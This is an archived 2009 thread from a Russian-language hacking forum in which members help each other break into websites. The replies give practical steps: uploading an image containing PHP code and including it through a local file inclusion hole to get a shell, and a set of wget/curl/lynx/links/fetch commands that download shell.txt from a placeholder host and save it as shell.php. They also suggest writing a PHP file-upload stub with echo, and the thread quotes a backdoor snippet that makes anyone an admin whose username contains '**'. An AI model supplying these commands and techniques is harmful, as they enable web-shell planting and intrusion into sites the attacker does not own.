ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.11.2009, 10:59
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Такой вопрос...
Почему при загрузке файла с бек слешом ("\" без ковычек), отделяется все что было до бек слеша
К примеру
Грузим файл под названием: file.php\jpg
А PHP берет и загружает под именем: jpg
|
|
|
24.11.2009, 12:30
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от wolmer
Такой вопрос...
Почему при загрузке файла с бек слешом ("\" без ковычек), отделяется все что было до бек слеша
К примеру
Грузим файл под названием: file.php\jpg
А PHP берет и загружает под именем: jpg
Потому что file.php воспринимается как имя директории и отсекается.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
24.11.2009, 13:12
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706
Репутация:
-1
|
|
Народ,разъясните такую фишку:
PHP код:
if(strstr($username, '**')) {
$admin = 1;
$username = str_replace('**', '', $username);
$_SESSION['admin'] = 1;
} else {
$admin = 0;
}
Я так понял,если в поле username(входа в админку,например) содержится **,то я получаю админскую сессию,становясь,таким образом,админом?))И стать им может любой,кто введёт эти две звёздочки в любом месте поля username...
Только я не понял смысла это выкладывать - ведь не узнаешь,пока исходник скрипта не прочитаешь(а я так понял,это самоделка какая-то,а не кусок кода популярного двига).
Взял с _http://oxod.ru/2009/11/23/лучшие-из-лучших/#more-380 |
|
|
|
24.11.2009, 15:05
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
При локальном инклуде читаю конфиг сайта.Хочу поробовать подключиться к БД.Как это сделать удаленно?Допусим есть данные-username,password,db_name.Поле хост-localhost(все это в конфиге).
Пробую через EngInSite MySQL Client.-Неполучается,говорит мол хост неотвечает,в поле хост указывал IP сайта...
|
|
|
|
24.11.2009, 15:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Сообщение от 2Fed123
При локальном инклуде читаю конфиг сайта.Хочу поробовать подключиться к БД.Как это сделать удаленно?Допусим есть данные-username,password,db_name.Поле хост-localhost(все это в конфиге).
Пробую через EngInSite MySQL Client.-Неполучается,говорит мол хост неотвечает,в поле хост указывал IP сайта...
С такими способами один шанс на несколько тысяч миллиардов.
для удаленного коннекта должен быть разрешен коннект именно для твоего айпи.
ищи phpMyAdmin.
Бруть диры.
Могу посоветовать сканер http://security-digger.org/
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
24.11.2009, 15:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от 2Fed123
При локальном инклуде читаю конфиг сайта.Хочу поробовать подключиться к БД.Как это сделать удаленно?Допусим есть данные-username,password,db_name.Поле хост-localhost(все это в конфиге).
Пробую через EngInSite MySQL Client.-Неполучается,говорит мол хост неотвечает,в поле хост указывал IP сайта...
говорит мол хост неотвечает
Естественно , там localhost, то есть тока фактически с этого компа (серва) ты можеш приконнектиться к БД, а удаленно ни как
При локальном инклуде читаю конфиг сайта
попробуй найти форум/аплоад картинок/etc/
что ба залить фотку с пхп кодом, и инклудь ее уж тогда, что бы потом получить шелл,а вот с шелла и заходи в БД , если будет такая необходимость
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
Последний раз редактировалось HAXTA4OK; 24.11.2009 в 15:18..
|
|
|
|
24.11.2009, 16:46
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706
Репутация:
-1
|
|
Почему не работает команда lynx ? Вроде делаю всё прально:
lynx -source "www.obsd.si/faq/pf/index.html" > /var/www/users/xxx/htdocs/papka/i.html
На папке полные права.Пробовал по всякому,альтернативных команд нету,насколько я знаю,а wget отключён.Touch работает.Мб есть способ как-то создать фаил и передать в него сразу код шелла?)Правда,140+ кб...
Последний раз редактировалось GenTao; 24.11.2009 в 16:50..
|
|
|
|
24.11.2009, 16:51
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Сообщение от GenTao
Почему не работает команда lynx ? Вроде делаю всё прально:
lynx -source "www.obsd.si/faq/pf/index.html" > /var/www/users/xxx/htdocs/papka/i.html
На папке полные права.Пробовал по всякому,альтернативных команд нету,насколько я знаю,а wget отключён
Посмотри есть ли сама качалка
which wget; which curl; which lynx; which links; which fetch
потом уже качай
wget http://site.com/shell.txt -O /home/user/shell.php
links -source http://site.com/shell.txt > /home/user/shell.php
lynx -source http://site.com/shell.txt > /home/user/shell.php
fetch -o http://site.com/shell.txt -p /home/user/shell.php
curl http://site.com/shell.txt -o /home/user/shell.php
UPDATE:
не проверил, но мне кажется синтаксис мягко говоря не верный.
"www.obsd.si/faq/pf/index.html" ...
(Чисто субъективное мнение, ни тебе протокола, ни здавствуйте, ни досвиданья! =))
__________________
You may say I'm a dreamer
But I'm not the only one
Последний раз редактировалось Twoster; 24.11.2009 в 16:54..
|
|
|
|
24.11.2009, 16:52
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706
Репутация:
-1
|
|
Качалка есть,проверял
|
|
|
|
24.11.2009, 16:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131
Репутация:
1695
|
|
Сообщение от GenTao
Мб есть способ как-то создать фаил и передать в него сразу код шелла?)Правда,140+ кб...
Ага, типа
echo "<?phpinfo();?>" > /tmp/test.php
в место phpinfo, думаю стоит указать что-то типа:
copy($_FILES['filename']['tmp_name'], '/куда/надо/записать.php');
и через этот скрипт средствами php уже грузить любые файлы.
__________________
Cервер cs 1.6
cs.antichat.net:27015
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
